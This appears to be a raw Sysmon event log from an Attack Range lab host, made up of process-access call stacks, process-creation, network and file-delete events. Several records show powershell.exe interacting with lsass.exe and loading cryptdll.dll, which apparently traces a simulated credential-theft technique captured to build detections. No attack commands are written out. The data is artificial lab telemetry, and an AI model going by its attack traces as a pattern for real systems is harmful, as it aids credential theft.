18:18:28.992{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.992{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.992{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.992{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.992{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4FF4-613A-8390-03000000C801}5764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.992{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FF4-613A-8390-03000000C801}5764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.977{B81B27B7-4FF4-613A-8390-03000000C801}5764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035086206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:53.566{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56806-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035086205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:53.235{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56805-false10.0.1.12-8000- 23542300x800000000000000035086204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.576{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C7D751B91AE2FEB448553E19A0F5BEA8,SHA256=0C366E3AFB0F8C1F2F8E4EBB44B5D2DD83C7AFC35D02AF67CFA2FB3A7BDBC539,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.576{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=522D450339F7AE8BE981B840A1B395F5,SHA256=F5E9626663EFA8B1DD8C1CDAF6C86128E8F7101A41D04DF937740FCF9D5BB53A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.545{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=11078065DF3FC7F8E0322A6DDB343A03,SHA256=39B4A8B7636CE49B8B8A60F3D7BA1D7D8D7CB5F8D62FD79617B7E92F1C244135,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.513{B81B27B7-4FF3-613A-8190-03000000C801}5504ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.408{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035086199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.408{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035086198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.392{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035086197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.361{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 734700x800000000000000035086196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.314{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000035086195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.300{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.299{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4FF3-613A-8190-03000000C801}5504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.292{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FF4-613A-8290-03000000C801}296C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.290{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.290{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.290{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.290{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.289{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4FF4-613A-8290-03000000C801}296C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.289{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FF4-613A-8290-03000000C801}296C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.271{B81B27B7-4FF4-613A-8290-03000000C801}296C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.282{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CA5EFF2EC9737586F1FF65A397BAA57,SHA256=2DA065DABE5CCC3B7731771ECA7CACA227E7F98F0DA96B942207B5E79C8F97B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.230{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=379892E442E228AB93B61901863E1D3B,SHA256=254DDF3A16A2E5CD449E98292210C73CFA44EEED78CAA6316A2F48B0DF4A9AF0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:28.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 